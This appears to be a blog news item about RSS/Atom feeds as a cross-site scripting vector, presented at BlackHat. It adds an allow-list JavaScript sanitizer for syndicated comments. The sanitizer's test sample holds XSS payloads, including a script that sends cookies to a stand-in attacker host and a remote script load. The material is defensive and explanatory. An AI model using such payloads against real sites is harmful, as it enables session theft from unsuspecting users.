Summary
At last week's BlackHat security conference, Bob Auger of SPI Dynamics presented on malicious scripts delivered through RSS and Atom feeds, an often overlooked vector for cross-site scripting.
Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. "A lot of blogs will take user comments and stick them into their own RSS feeds," he said... Also, attackers could send malicious code to mailing lists that offer RSS or Atom feeds and commandeer vulnerable systems that way, Auger said.
A key reason for concern is that many feed readers render feed content with the privileges of a local application rather than inside a restricted browser context, so script embedded in a feed item runs with full access to the operating system. Auger's recommendation to site and blog software authors was to strip scripts from blog text before it is syndicated.
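Stripping has to happen on the syndicating side, before a comment lands in the feed, and removing `<script>` elements alone is not enough: event-handler attributes and `javascript:` links carry script just as well. The following is an added example, not code from this article or from SPI Dynamics, of an allow-list sanitizer for feed item bodies written in JavaScript. It keeps a short list of harmless tags and attributes, drops `<script>` and `<style>` bodies, rejects `href` values whose scheme is anything other than http, https or mailto (after decoding entities and removing the control characters browsers ignore), and escapes everything it does not recognise. The sample comment, the hostnames `attacker.invalid` and `example.org`, and the particular tag list are constructed for the example.

```javascript
// Allow-list sanitizer for user-contributed text that a blog will syndicate
// into its feed. Added example; assumptions: the tag/attribute lists below
// are a reasonable minimum for comments, and the feed item body is HTML.
const ALLOWED_TAGS = new Set(["p", "a", "b", "i", "em", "strong", "ul", "ol",
                              "li", "br", "blockquote", "code", "pre"]);
const ALLOWED_ATTRS = new Map([["a", new Set(["href", "title"])]]);
const URL_ATTRS = new Set(["href"]);
const RAW_TEXT_TAGS = new Set(["script", "style"]); // bodies are dropped whole
const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'",
                         colon: ":", tab: "\t", newline: "\n" };

function escapeText(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

function fromCode(n) {
  return Number.isNaN(n) || n > 0x10ffff ? "\uFFFD" : String.fromCodePoint(n);
}

// Decode the entity forms a browser would decode inside an attribute value,
// so that "j&#97;vascript:" is judged as "javascript:". Single pass only,
// which matches what a browser does with "&amp;#106;" (it stays literal).
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]{1,8});?/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d{1,8});?/g, (_, d) => fromCode(parseInt(d, 10)))
    .replace(/&([a-z]+);/gi, (m, n) => NAMED_ENTITIES[n.toLowerCase()] ?? m);
}

// Relative URLs and http/https/mailto are allowed; any other scheme
// (javascript:, data:, vbscript:, ...) is rejected. Control characters and
// spaces are removed before the check because browsers ignore them in the
// scheme, so "java\tscript:" and "\u0001javascript:" are still caught.
function safeUrl(decodedValue) {
  const probe = decodedValue.replace(/[\u0000-\u0020]/g, "").toLowerCase();
  const scheme = probe.match(/^([a-z][a-z0-9+.-]*):/);
  return scheme === null || ["http", "https", "mailto"].includes(scheme[1]);
}

// Re-emit only the attributes allowed for this tag; this is what removes
// onerror=, onmouseover= and style= without needing a deny-list of handlers.
function renderAttrs(tag, attrText) {
  const allowed = ALLOWED_ATTRS.get(tag);
  if (!allowed) return "";
  const attrRe = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let out = "";
  let a;
  while ((a = attrRe.exec(attrText)) !== null) {
    const name = a[1].toLowerCase();
    if (!allowed.has(name)) continue;
    const value = decodeEntities(a[2] ?? a[3] ?? a[4] ?? "");
    if (URL_ATTRS.has(name) && !safeUrl(value)) continue;
    out += ` ${name}="${escapeText(value)}"`;
  }
  return out;
}

function sanitizeHtml(html) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  let out = "";
  let pos = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeText(html.slice(pos, m.index)); // text between tags
    pos = tagRe.lastIndex;
    const closing = m[1] === "/";
    const name = m[2].toLowerCase();
    if (!closing && RAW_TEXT_TAGS.has(name)) {
      // Skip to the matching close tag; an unterminated body is dropped
      // entirely rather than being allowed to swallow the rest as "text".
      const closeRe = new RegExp("</" + name + "\\s*>", "gi");
      closeRe.lastIndex = pos;
      const c = closeRe.exec(html);
      pos = c === null ? html.length : c.index + c[0].length;
      tagRe.lastIndex = pos;
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue; // unknown tag dropped, its text kept
    if (closing) { if (name !== "br") out += `</${name}>`; continue; }
    out += "<" + name + renderAttrs(name, m[3]) + ">";
  }
  out += escapeText(html.slice(pos)); // anything after the last complete tag
  return out;
}

// Constructed sample: one comment mixing a legitimate link with the payloads
// a filter that only strips <script> elements would miss.
const SAMPLE_COMMENT = [
  '<p>Nice post! <a href="https://example.org/" title="site">my site</a></p>',
  '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>',
  '<img src="x" onerror="alert(document.domain)">',
  '<a href="j&#97;vascript:alert(1)">click</a>',
  '<a href=" JAVA\tSCRIPT:alert(2)">click</a>',
  '<style>body{display:none}</style><b onmouseover="alert(3)">bold</b>',
  '<p>Unterminated <script src="http://attacker.invalid/x.js"',
].join("\n");

console.log(sanitizeHtml(SAMPLE_COMMENT));
```

The regex tokenizer is deliberately conservative: anything it cannot parse as a complete tag (a `<script` with no closing `>`, an attribute value containing `>`) falls through to `escapeText` and is rendered as literal text, so parse failures err toward safety. For a production feed, a maintained parser-based sanitizer is the better choice, and feed readers should additionally render item bodies in a restricted, non-privileged context rather than rely on the publisher having sanitized them.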
Stripping scripts from user-contributed blog and forum text is reasonable, but the recent uptake of JavaScript in Ajax applications means that JavaScript is increasingly integral to Web applications themselves. Thus, disabling JavaScript in the browser altogether is no longer an option for many users.
To what extent do user concerns about JavaScript security affect your decisions to incorporate Ajax features in your Web applications?